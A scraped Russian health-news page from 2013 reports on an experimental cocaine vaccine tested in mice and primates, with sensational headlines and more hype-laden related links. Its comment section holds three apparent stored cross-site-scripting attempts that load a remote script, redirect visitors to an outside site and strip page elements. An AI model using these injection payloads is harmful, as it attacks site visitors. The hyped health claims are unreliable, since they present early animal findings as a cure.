Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Зависимость от кокаина бо...  >>  Зависимость от кокаина больше не страшна. Создана первая в мире вакцина от наркотика!
 
Обратная связь
 

Зависимость от кокаина больше не страшна. Создана первая в мире вакцина от наркотика!

Размер шрифта
20 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Татьяна Дубровская
Здоровье инфо
  • google_analytics: false
  • Нравится

У наркоманов всего мира появилась надежда на выздоровление. Впервые в истории человечества создана вакцина, которая не позволяет наркотику оказывать негативное влияние на мозг человека и вызывать зависимость.

зависимость от кокаина больше не страшна

Действие кокаина заключается в том, что, попадая в мозг, он уменьшает естественное разрушение дофамина – нейромедиатора удовольствия, он накапливается, и человек получает удовольствие.

Новая разработанная вакцина представляет собой комплекс из самого обычного вируса простуды и специальной молекулы, которая похожа на кокаин. Когда вакцина вводится животному, то его организм начинает бороться с вирусом, запуская иммунные реакции. Поскольку к вирусной частице прикреплена еще и молекула, похожая на кокаин, то иммунная система начинает бороться заодно и с ней. В итоге иммунная система вырабатывает антитела против кокаина и уничтожает его при первом поступление в кровь.

В этом исследовании ученые также пытались определить, какое количество вакцин необходимо для того, чтобы уменьшить эффекты кокаина. С помощью специально разработанного метода они оценивали, как кокаин влияет на рецепторы дофамина у вакцинированных и не вакцинированных. Оказалось, что уже после первого вакцинирования эффект кокаина уменьшается в 2,5 раза.  

Ученые пока не выяснили, насколько часто придется вводить вакцину людям для того, чтобы поддерживать антикокаиновый эффект продолжительное время, но мышам одно вакцинирование продляло этот эффект на 13 недель, и на 7 недель – приматам.

Это исследование – первое в своем роде. Оно дает надежду тысячам и тысячам людей и их близким, которые борются с этим страшным заболеванием.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сахар делает с мозгом то же, что кокаин   Марихуана – лучшее средство для бесплодия!   Вакцина, которую должен сделать каждый!   Вакцина от СПИДа полностью убирает вирус из организма! Болезнь излечима?  
04 июля 2013Героин станет безопасным! Изобретена вакцина от героиновой зависимости 19 июня 2013Зависимость от кокаина больше не страшна. Создана первая в мире вакцина от наркотика!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.